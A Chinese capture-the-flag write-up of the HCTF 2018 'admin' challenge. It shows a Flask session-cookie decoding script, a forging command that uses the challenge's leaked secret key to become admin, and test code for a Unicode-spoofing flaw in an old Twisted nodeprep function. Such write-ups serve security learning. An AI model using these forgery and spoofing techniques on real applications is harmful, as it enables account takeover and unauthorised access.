开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> Python知识库 -> [HCTF 2018]admin 1 -> 正文阅读

[Python知识库][HCTF 2018]admin 1

考点：

 1. flask session伪造
 2. Unicode欺骗

先注册一个账号，然后登录进入chang_password页面看源代码，里面给了我们一个网址，进去下载一下
在这里插入图片描述

一、flask session伪造

了解flask session伪造

在传统PHP开发中，$_SESSION变量的内容默认会被保存在服务端的一个文件中，通过一个叫“PHPSESSID”的Cookie来区分用户。这类session是“服务端session”，用户看到的只是session的名称（一个随机字符串），其内容保存在服务端。

而flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，

我觉得大概意思就是，传统的php开发，session是保存在服务端我们看不到改不了，
而flask的session是保存在客户端的cookie中，我们可以看到，并且flask仅仅只对数据签名，
相当于加个身份证号码，并没有进行加密，虽然没有加密，但我们要进行伪造还要有SECRET_KEY，
这个就相当于身份证号码了。

想要细致了解的可要参考目录下的链接中看。

解题步骤：

我们登录的完可看到自己的session
在这里插入图片描述
把它复制下来用解密脚本解密（脚本出处：p佬）

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

在这里插入图片描述
解密完后我们就可以清楚的看到session中的内容和构造了,其中有个token，咱们了解一下token的生成方式

生成方式（ 内部配置的私钥+有效期+用户的id ）

有效期+用户的id,我们只要登录了就会自带，重点是这个私钥，而这个私钥，它在config.py中告诉我们了“ckj123”。这个私钥我感觉有点类似身份证号，不管你人名字怎么改，身份证号码变不了。
在这里插入图片描述

而在index.html中已经告诉我们只有session[‘name’] == 'admin’时才能拿到flag，所以我们就把解密后的name值改为admin呗,最后带上SECRET_KEY在加密一下呗

在这里插入图片描述

//index.html
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>

{% include('footer.html') %}

利用加密脚本和源码中给的SECRET_KEY加密一下即可
在这里插入图片描述

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'1e64fd62946046b5c27b0e0c57aebab558b13043a87ea1ae8e5cb986426fa3d9187149035cc376882e27bc09284eefa41b41c22e2d02facaf4a46ddbf56226ea', 'csrf_token': b'52fc8bb5432576bfc1c7f05f7c0b8691664d8478', 'image': b'almy', 'name': 'admin', 'user_id': '10'}"

把我们利用SECRET_key加密生成的session带入,可以抓包改值。
在这里插入图片描述
go一下，拿到flag

二、Unicode欺骗

路由中有一个strlower函数，是用来改字母小写，并且登录，注册改密码中都有此函数
在这里插入图片描述

都是用strlower()来转小写，而python有转小写函数lower()，看一下strlower()

def strlower(username):
    username = nodeprep.prepare(username)
    return username

问题在nodeprep.prepare函数，在requirements.txt文件中发现Twisted==10.2.0，而最新版本要远大于他，所以应该会有漏洞，我们测一下有什么区别。

from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep

def strlower(name):
	str = nodeprep.prepare(name)
	return str
	
print (u'\u1d2c\u1d30\u1d39\u1d35\u1d3A')
print (strlower(u'\u1d2c\u1d30\u1d39\u1d35\u1d3A'))
print (strlower(strlower(u'\u1d2c\u1d30\u1d39\u1d35\u1d3A')))
//但我这边编译有问题，暂不清楚在哪。